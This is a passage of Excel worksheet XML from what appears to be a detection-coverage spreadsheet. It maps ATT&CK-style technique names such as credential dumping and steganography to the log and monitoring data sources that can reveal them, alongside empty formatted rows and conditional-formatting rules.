      <c r="D344" s="14"/>
      <c r="E344" s="14"/>
      <c r="F344" s="15"/>
    </row>
    <row r="345" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C345" s="14"/>
      <c r="D345" s="14"/>
      <c r="E345" s="14"/>
      <c r="F345" s="15"/>
    </row>
    <row r="346" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C346" s="14"/>
      <c r="D346" s="14"/>
      <c r="E346" s="14"/>
      <c r="F346" s="15"/>
    </row>
    <row r="347" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C347" s="14"/>
      <c r="D347" s="14"/>
      <c r="E347" s="14"/>
      <c r="F347" s="15"/>
    </row>
    <row r="348" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C348" s="14"/>
      <c r="D348" s="14"/>
      <c r="E348" s="14"/>
      <c r="F348" s="15"/>
    </row>
    <row r="349" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C349" s="14"/>
      <c r="D349" s="14"/>
      <c r="E349" s="14"/>
      <c r="F349" s="15"/>
    </row>
    <row r="350" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C350" s="14"/>
      <c r="D350" s="14"/>
      <c r="E350" s="14"/>
      <c r="F350" s="15"/>
    </row>
    <row r="351" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C351" s="14"/>
      <c r="D351" s="14"/>
      <c r="E351" s="14"/>
      <c r="F351" s="15"/>
    </row>
    <row r="352" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C352" s="14"/>
      <c r="D352" s="14"/>
      <c r="E352" s="14"/>
      <c r="F352" s="15"/>
    </row>
    <row r="353" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C353" s="14"/>
      <c r="D353" s="14"/>
      <c r="E353" s="14"/>
      <c r="F353" s="15"/>
    </row>
    <row r="354" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C354" s="14"/>
      <c r="D354" s="14"/>
      <c r="E354" s="14"/>
      <c r="F354" s="15"/>
    </row>
    <row r="355" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C355" s="14"/>
      <c r="D355" s="14"/>
      <c r="E355" s="14"/>
      <c r="F355" s="15"/>
    </row>
    <row r="356" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C356" s="14"/>
      <c r="D356" s="14"/>
      <c r="E356" s="14"/>
      <c r="F356" s="15"/>
    </row>
    <row r="357" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C357" s="14"/>
      <c r="D357" s="14"/>
      <c r="E357" s="14"/>
      <c r="F357" s="15"/>
    </row>
    <row r="358" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C358" s="14"/>
      <c r="D358" s="14"/>
      <c r="E358" s="14"/>
      <c r="F358" s="15"/>
    </row>
    <row r="359" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C359" s="14"/>
      <c r="D359" s="14"/>
      <c r="E359" s="14"/>
      <c r="F359" s="15"/>
    </row>
    <row r="360" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C360" s="14"/>
      <c r="D360" s="14"/>
      <c r="E360" s="14"/>
      <c r="F360" s="15"/>
    </row>
    <row r="361" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C361" s="14"/>
      <c r="D361" s="14"/>
      <c r="E361" s="14"/>
      <c r="F361" s="15"/>
    </row>
    <row r="362" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C362" s="14"/>
      <c r="D362" s="14"/>
      <c r="E362" s="14"/>
      <c r="F362" s="15"/>
    </row>
    <row r="363" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C363" s="14"/>
      <c r="D363" s="14"/>
      <c r="E363" s="14"/>
      <c r="F363" s="15"/>
    </row>
    <row r="364" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C364" s="14"/>
      <c r="D364" s="14"/>
      <c r="E364" s="14"/>
      <c r="F364" s="15"/>
    </row>
    <row r="365" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C365" s="14"/>
      <c r="D365" s="14"/>
      <c r="E365" s="14"/>
      <c r="F365" s="15"/>
    </row>
    <row r="366" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C366" s="14"/>
      <c r="D366" s="14"/>
      <c r="E366" s="14"/>
      <c r="F366" s="15"/>
    </row>
    <row r="367" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C367" s="14"/>
      <c r="D367" s="14"/>
      <c r="E367" s="14"/>
      <c r="F367" s="15"/>
    </row>
    <row r="368" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C368" s="14"/>
      <c r="D368" s="14"/>
      <c r="E368" s="14"/>
      <c r="F368" s="15"/>
    </row>
    <row r="369" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C369" s="14"/>
      <c r="D369" s="14"/>
      <c r="E369" s="14"/>
      <c r="F369" s="15"/>
    </row>
    <row r="370" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C370" s="14"/>
      <c r="D370" s="14"/>
      <c r="E370" s="14"/>
      <c r="F370" s="15"/>
    </row>
    <row r="371" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C371" s="14"/>
      <c r="D371" s="14"/>
      <c r="E371" s="14"/>
      <c r="F371" s="15"/>
    </row>
    <row r="372" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C372" s="14"/>
      <c r="D372" s="14"/>
      <c r="E372" s="14"/>
      <c r="F372" s="15"/>
    </row>
    <row r="373" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C373" s="14"/>
      <c r="D373" s="14"/>
      <c r="E373" s="14"/>
      <c r="F373" s="15"/>
    </row>
    <row r="374" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C374" s="14"/>
      <c r="D374" s="14"/>
      <c r="E374" s="14"/>
      <c r="F374" s="15"/>
    </row>
    <row r="375" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C375" s="14"/>
      <c r="D375" s="14"/>
      <c r="E375" s="14"/>
      <c r="F375" s="15"/>
    </row>
    <row r="376" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C376" s="14"/>
      <c r="D376" s="14"/>
      <c r="E376" s="14"/>
      <c r="F376" s="15"/>
    </row>
    <row r="377" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C377" s="14"/>
      <c r="D377" s="14"/>
      <c r="E377" s="14"/>
      <c r="F377" s="15"/>
    </row>
    <row r="378" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C378" s="14"/>
      <c r="D378" s="14"/>
      <c r="E378" s="14"/>
      <c r="F378" s="15"/>
    </row>
    <row r="379" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C379" s="14"/>
      <c r="D379" s="14"/>
      <c r="E379" s="14"/>
      <c r="F379" s="15"/>
    </row>
    <row r="380" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C380" s="14"/>
      <c r="D380" s="14"/>
      <c r="E380" s="14"/>
      <c r="F380" s="15"/>
    </row>
    <row r="381" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C381" s="14"/>
      <c r="D381" s="14"/>
      <c r="E381" s="14"/>
      <c r="F381" s="15"/>
    </row>
    <row r="382" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C382" s="14"/>
      <c r="D382" s="14"/>
      <c r="E382" s="14"/>
      <c r="F382" s="15"/>
    </row>
    <row r="383" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C383" s="14"/>
      <c r="D383" s="14"/>
      <c r="E383" s="14"/>
      <c r="F383" s="15"/>
    </row>
    <row r="384" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C384" s="14"/>
      <c r="D384" s="14"/>
      <c r="E384" s="14"/>
      <c r="F384" s="15"/>
    </row>
    <row r="385" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C385" s="14"/>
      <c r="D385" s="14"/>
      <c r="E385" s="14"/>
      <c r="F385" s="15"/>
    </row>
    <row r="386" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C386" s="14"/>
      <c r="D386" s="14"/>
      <c r="E386" s="14"/>
      <c r="F386" s="15"/>
    </row>
    <row r="387" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C387" s="14"/>
      <c r="D387" s="14"/>
      <c r="E387" s="14"/>
      <c r="F387" s="15"/>
    </row>
    <row r="388" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C388" s="14"/>
      <c r="D388" s="14"/>
      <c r="E388" s="14"/>
      <c r="F388" s="15"/>
    </row>
    <row r="389" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C389" s="14"/>
      <c r="D389" s="14"/>
      <c r="E389" s="14"/>
      <c r="F389" s="15"/>
    </row>
    <row r="390" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C390" s="14"/>
      <c r="D390" s="14"/>
      <c r="E390" s="14"/>
      <c r="F390" s="15"/>
    </row>
    <row r="391" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C391" s="14"/>
      <c r="D391" s="14"/>
      <c r="E391" s="14"/>
      <c r="F391" s="15"/>
    </row>
    <row r="392" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C392" s="14"/>
      <c r="D392" s="14"/>
      <c r="E392" s="14"/>
      <c r="F392" s="15"/>
    </row>
    <row r="393" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C393" s="14"/>
      <c r="D393" s="14"/>
      <c r="E393" s="14"/>
      <c r="F393" s="15"/>
    </row>
    <row r="394" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C394" s="14"/>
      <c r="D394" s="14"/>
      <c r="E394" s="14"/>
      <c r="F394" s="15"/>
    </row>
    <row r="395" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C395" s="14"/>
      <c r="D395" s="14"/>
      <c r="E395" s="14"/>
      <c r="F395" s="15"/>
    </row>
    <row r="396" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C396" s="14"/>
      <c r="D396" s="14"/>
      <c r="E396" s="14"/>
      <c r="F396" s="15"/>
    </row>
    <row r="397" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C397" s="14"/>
      <c r="D397" s="14"/>
      <c r="E397" s="14"/>
      <c r="F397" s="15"/>
    </row>
    <row r="398" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C398" s="14"/>
      <c r="D398" s="14"/>
      <c r="E398" s="14"/>
      <c r="F398" s="15"/>
    </row>
    <row r="399" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C399" s="14"/>
      <c r="D399" s="14"/>
      <c r="E399" s="14"/>
      <c r="F399" s="15"/>
    </row>
    <row r="400" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C400" s="14"/>
      <c r="D400" s="14"/>
      <c r="E400" s="14"/>
      <c r="F400" s="15"/>
    </row>
    <row r="401" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C401" s="14"/>
      <c r="D401" s="14"/>
      <c r="E401" s="14"/>
      <c r="F401" s="15"/>
    </row>
    <row r="402" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C402" s="14"/>
      <c r="D402" s="14"/>
      <c r="E402" s="14"/>
      <c r="F402" s="15"/>
    </row>
    <row r="403" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C403" s="14"/>
      <c r="D403" s="14"/>
      <c r="E403" s="14"/>
      <c r="F403" s="15"/>
    </row>
    <row r="404" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C404" s="14"/>
      <c r="D404" s="14"/>
      <c r="E404" s="14"/>
      <c r="F404" s="15"/>
    </row>
    <row r="405" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C405" s="14"/>
      <c r="D405" s="14"/>
      <c r="E405" s="14"/>
      <c r="F405" s="15"/>
    </row>
    <row r="406" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C406" s="14"/>
      <c r="D406" s="14"/>
      <c r="E406" s="14"/>
      <c r="F406" s="15"/>
    </row>
    <row r="407" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C407" s="14"/>
      <c r="D407" s="14"/>
      <c r="E407" s="14"/>
      <c r="F407" s="15"/>
    </row>
    <row r="408" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C408" s="14"/>
      <c r="D408" s="14"/>
      <c r="E408" s="14"/>
      <c r="F408" s="15"/>
    </row>
    <row r="409" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C409" s="14"/>
      <c r="D409" s="14"/>
      <c r="E409" s="14"/>
      <c r="F409" s="15"/>
    </row>
    <row r="410" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C410" s="14"/>
      <c r="D410" s="14"/>
      <c r="E410" s="14"/>
      <c r="F410" s="15"/>
    </row>
    <row r="411" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C411" s="14"/>
      <c r="D411" s="14"/>
      <c r="E411" s="14"/>
      <c r="F411" s="15"/>
    </row>
    <row r="412" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C412" s="14"/>
      <c r="D412" s="14"/>
      <c r="E412" s="14"/>
      <c r="F412" s="15"/>
    </row>
    <row r="413" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C413" s="14"/>
      <c r="D413" s="14"/>
      <c r="E413" s="14"/>
      <c r="F413" s="15"/>
    </row>
    <row r="414" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C414" s="14"/>
      <c r="D414" s="14"/>
      <c r="E414" s="14"/>
      <c r="F414" s="15"/>
    </row>
    <row r="415" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C415" s="14"/>
      <c r="D415" s="14"/>
      <c r="E415" s="14"/>
      <c r="F415" s="15"/>
    </row>
    <row r="416" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C416" s="14"/>
      <c r="D416" s="14"/>
      <c r="E416" s="14"/>
      <c r="F416" s="15"/>
    </row>
    <row r="417" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C417" s="14"/>
      <c r="D417" s="14"/>
      <c r="E417" s="14"/>
      <c r="F417" s="15"/>
    </row>
    <row r="418" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C418" s="14"/>
      <c r="D418" s="14"/>
      <c r="E418" s="14"/>
      <c r="F418" s="15"/>
    </row>
    <row r="419" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C419" s="14"/>
      <c r="D419" s="14"/>
      <c r="E419" s="14"/>
      <c r="F419" s="15"/>
    </row>
    <row r="420" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C420" s="14"/>
      <c r="D420" s="14"/>
      <c r="E420" s="14"/>
      <c r="F420" s="15"/>
    </row>
    <row r="421" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C421" s="14"/>
      <c r="D421" s="14"/>
      <c r="E421" s="14"/>
      <c r="F421" s="15"/>
    </row>
    <row r="422" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C422" s="14"/>
      <c r="D422" s="14"/>
      <c r="E422" s="14"/>
      <c r="F422" s="15"/>
    </row>
    <row r="423" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C423" s="14"/>
      <c r="D423" s="14"/>
      <c r="E423" s="14"/>
      <c r="F423" s="15"/>
    </row>
    <row r="424" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C424" s="14"/>
      <c r="D424" s="14"/>
      <c r="E424" s="14"/>
      <c r="F424" s="15"/>
    </row>
    <row r="425" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C425" s="14"/>
      <c r="D425" s="14"/>
      <c r="E425" s="14"/>
      <c r="F425" s="15"/>
    </row>
    <row r="426" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C426" s="14"/>
      <c r="D426" s="14"/>
      <c r="E426" s="14"/>
      <c r="F426" s="15"/>
    </row>
    <row r="427" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C427" s="14"/>
      <c r="D427" s="14"/>
      <c r="E427" s="14"/>
      <c r="F427" s="15"/>
    </row>
    <row r="428" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C428" s="14"/>
      <c r="D428" s="14"/>
      <c r="E428" s="14"/>
      <c r="F428" s="15"/>
    </row>
    <row r="429" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C429" s="14"/>
      <c r="D429" s="14"/>
      <c r="E429" s="14"/>
      <c r="F429" s="15"/>
    </row>
    <row r="430" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C430" s="14"/>
      <c r="D430" s="14"/>
      <c r="E430" s="14"/>
      <c r="F430" s="15"/>
    </row>
    <row r="431" spans="3:6" x14ac:dyDescent="0.2">
      <c r="C431" s="14"/>
      <c r="D431" s="14"/>
      <c r="E431" s="14"/>
      <c r="F431" s="15"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="F2:F80">
    <cfRule type="dataBar" priority="4">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{99251DE5-4CC0-42A8-ADF2-4A796373022F}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I8">
    <cfRule type="colorScale" priority="5">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="percent" val="50"/>
        <cfvo type="max"/>
        <color rgb="FFF8696B"/>
        <color rgb="FFFFEB84"/>
        <color rgb="FF63BE7B"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C2:E1048576">
    <cfRule type="dataBar" priority="3">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{DE5B108D-72D9-4A03-A413-D92071D2C303}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F81:F245">
    <cfRule type="dataBar" priority="1">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{CE2FE5C7-3DDB-4C24-A14A-A68AEE43D83D}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait"/>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99251DE5-4CC0-42A8-ADF2-4A796373022F}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F2:F80</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{DE5B108D-72D9-4A03-A413-D92071D2C303}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C2:E1048576</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{CE2FE5C7-3DDB-4C24-A14A-A68AEE43D83D}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F81:F245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V570"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScale="150" zoomScaleNormal="150" workbookViewId="0">
      <selection activeCell="A360" sqref="A360:A363"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="16.1640625" style="4" customWidth="1"/>
    <col min="2" max="2" width="124.83203125" style="4" customWidth="1"/>
    <col min="3" max="3" width="21" style="5" customWidth="1"/>
    <col min="4" max="4" width="5.1640625" style="4" customWidth="1"/>
    <col min="5" max="5" width="3.33203125" style="4" customWidth="1"/>
    <col min="6" max="6" width="11.1640625" style="4" customWidth="1"/>
    <col min="7" max="7" width="47.6640625" style="12" customWidth="1"/>
    <col min="8" max="22" width="9.1640625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="33" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="28" t="s">
        <v>37</v>
      </c>
      <c r="B1" s="28" t="s">
        <v>3108</v>
      </c>
      <c r="C1" s="28" t="s">
        <v>39</v>
      </c>
      <c r="D1" s="28" t="s">
        <v>40</v>
      </c>
      <c r="E1" s="28" t="s">
        <v>41</v>
      </c>
      <c r="F1" s="28" t="s">
        <v>3101</v>
      </c>
      <c r="G1" s="28" t="s">
        <v>3102</v>
      </c>
    </row>
    <row r="2" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A2" s="55" t="s">
        <v>44</v>
      </c>
      <c r="B2" s="13" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C2" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D2" s="13">
        <f>LEN(TRIM(B2))-LEN(SUBSTITUTE(TRIM(B2),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E2" s="13">
        <f t="shared" ref="E2:E8" si="0">LEN(TRIM(C2))-LEN(SUBSTITUTE(TRIM(C2),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F2" s="18"/>
      <c r="G2" s="13" t="str">
        <f>VLOOKUP(A2,'REF-DataSources'!A:B,2)</f>
        <v>Data Obfuscation</v>
      </c>
    </row>
    <row r="3" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A3" s="55" t="s">
        <v>540</v>
      </c>
      <c r="B3" s="13" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C3" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D3" s="13">
        <f t="shared" ref="D3:D66" si="1">LEN(TRIM(B3))-LEN(SUBSTITUTE(TRIM(B3),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E3" s="13">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F3" s="18"/>
      <c r="G3" s="53" t="str">
        <f>VLOOKUP(A3,'REF-DataSources'!A:B,2)</f>
        <v>Junk Data</v>
      </c>
    </row>
    <row r="4" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A4" s="55" t="s">
        <v>544</v>
      </c>
      <c r="B4" s="13" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C4" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D4" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E4" s="13">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F4" s="18"/>
      <c r="G4" s="53" t="str">
        <f>VLOOKUP(A4,'REF-DataSources'!A:B,2)</f>
        <v>Steganography</v>
      </c>
    </row>
    <row r="5" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A5" s="55" t="s">
        <v>547</v>
      </c>
      <c r="B5" s="13" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C5" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D5" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E5" s="13">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F5" s="18"/>
      <c r="G5" s="53" t="str">
        <f>VLOOKUP(A5,'REF-DataSources'!A:B,2)</f>
        <v>Protocol Impersonation</v>
      </c>
    </row>
    <row r="6" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A6" s="55" t="s">
        <v>48</v>
      </c>
      <c r="B6" s="13" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,PowerShell logs,Process command-line parameters</v>
      </c>
      <c r="C6" s="17" t="s">
        <v>47</v>
      </c>
      <c r="D6" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E6" s="13">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F6" s="18"/>
      <c r="G6" s="53" t="str">
        <f>VLOOKUP(A6,'REF-DataSources'!A:B,2)</f>
        <v>OS Credential Dumping</v>
      </c>
    </row>
    <row r="7" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A7" s="55" t="s">
        <v>557</v>
      </c>
      <c r="B7" s="17" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,PowerShell logs,Process monitoring</v>
      </c>
      <c r="C7" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D7" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E7" s="17">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="F7" s="18"/>
      <c r="G7" s="53" t="str">
        <f>VLOOKUP(A7,'REF-DataSources'!A:B,2)</f>
        <v>LSASS Memory</v>
      </c>
    </row>
    <row r="8" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A8" s="55" t="s">
        <v>563</v>
      </c>
      <c r="B8" s="17" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,PowerShell logs,Process monitoring</v>
      </c>
      <c r="C8" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D8" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E8" s="17">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="F8" s="18"/>
      <c r="G8" s="53" t="str">
        <f>VLOOKUP(A8,'REF-DataSources'!A:B,2)</f>
        <v>Security Account Manager</v>
      </c>
    </row>
    <row r="9" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A9" s="55" t="s">
        <v>567</v>
      </c>
      <c r="B9" s="17" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,PowerShell logs,Process monitoring</v>
      </c>
      <c r="C9" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D9" s="17">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E9" s="17">
        <f>LEN(TRIM(C9))-LEN(SUBSTITUTE(TRIM(C9),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F9" s="18"/>
      <c r="G9" s="53" t="str">
        <f>VLOOKUP(A9,'REF-DataSources'!A:B,2)</f>
        <v>NTDS</v>
      </c>
    </row>
    <row r="10" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A10" s="55" t="s">
        <v>572</v>
      </c>
      <c r="B10" s="17" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,PowerShell logs,Process command-line parameters</v>
      </c>
      <c r="C10" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D10" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E10" s="17">
        <f t="shared" ref="E10:E73" si="2">LEN(TRIM(C10))-LEN(SUBSTITUTE(TRIM(C10),";",""))+1</f>
        <v>3</v>
      </c>
      <c r="F10" s="18"/>
      <c r="G10" s="53" t="str">
        <f>VLOOKUP(A10,'REF-DataSources'!A:B,2)</f>
        <v>LSA Secrets</v>
      </c>
    </row>
    <row r="11" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A11" s="55" t="s">
        <v>577</v>
      </c>
      <c r="B11" s="17" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C11" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D11" s="17">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E11" s="17">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F11" s="13"/>
      <c r="G11" s="53" t="str">
        <f>VLOOKUP(A11,'REF-DataSources'!A:B,2)</f>
        <v>Cached Domain Credentials</v>
      </c>
    </row>
    <row r="12" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A12" s="55" t="s">
        <v>582</v>
      </c>
      <c r="B12" s="17" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:C)</f>
        <v>Windows event logs</v>
      </c>
      <c r="C12" s="17">
        <v>100</v>
      </c>
      <c r="D12" s="17">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E12" s="17">
